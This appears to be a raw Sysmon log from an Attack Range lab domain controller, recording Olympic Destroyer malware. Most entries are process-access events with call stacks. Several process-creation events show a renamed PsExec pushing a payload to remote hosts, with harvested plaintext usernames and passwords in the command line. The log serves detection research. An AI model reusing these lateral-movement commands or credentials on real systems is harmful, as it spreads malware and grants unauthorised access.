10:57:04.752{C8EA50B7-1300-6216-F105-000000003802}55886268C:\Windows\system32\conhost.exe{C8EA50B7-1300-6216-EF05-000000003802}4652C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292189Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.720{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1300-6216-F005-000000003802}5556C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292188Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.720{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1300-6216-F005-000000003802}5556C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292187Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.720{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1300-6216-F105-000000003802}5588C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292186Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.717{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1300-6216-F105-000000003802}5588C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292185Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.699{C8EA50B7-1300-6216-F005-000000003802}55565292C:\Windows\system32\conhost.exe{C8EA50B7-1300-6216-EE05-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292184Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.667{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1300-6216-F005-000000003802}5556C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292183Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.667{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1300-6216-F005-000000003802}5556C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292182Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.598{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292181Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.598{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292180Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.598{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292179Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.598{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292178Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292177Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292176Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292175Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292174Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.583{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1300-6216-EF05-000000003802}4652C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292173Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.583{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-1300-6216-EF05-000000003802}4652C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292172Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.585{C8EA50B7-1300-6216-EF05-000000003802}4652C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-12.eu-central-1.compute.internal -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292171Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.583{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1300-6216-EF05-000000003802}4652C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292170Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.567{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FCF067099ADAB1B1DB237B2F5382519,SHA256=F85905B36430F04953655C080C37732EA561BD5E42F940879EC7DACEF30D08FB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292169Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.536{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1300-6216-EE05-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292168Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.536{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-1300-6216-EE05-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292167Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.540{C8EA50B7-1300-6216-EE05-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.22 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292166Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.536{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1300-6216-EE05-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292165Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.520{C8EA50B7-1300-6216-EC05-000000003802}6488C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292164Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.520{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1300-6216-EC05-000000003802}6488C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292163Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.520{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1300-6216-EC05-000000003802}6488C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292162Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:04.498{C8EA50B7-1300-6216-EC05-000000003802}6488C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292161Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.452{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1300-6216-ED05-000000003802}5552C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292160Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.452{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1300-6216-ED05-000000003802}5552C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292159Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.436{C8EA50B7-1300-6216-ED05-000000003802}55522280C:\Windows\system32\conhost.exe{C8EA50B7-1300-6216-EC05-000000003802}6488C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292158Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.399{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1300-6216-ED05-000000003802}5552C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292157Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.399{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1300-6216-ED05-000000003802}5552C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292156Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 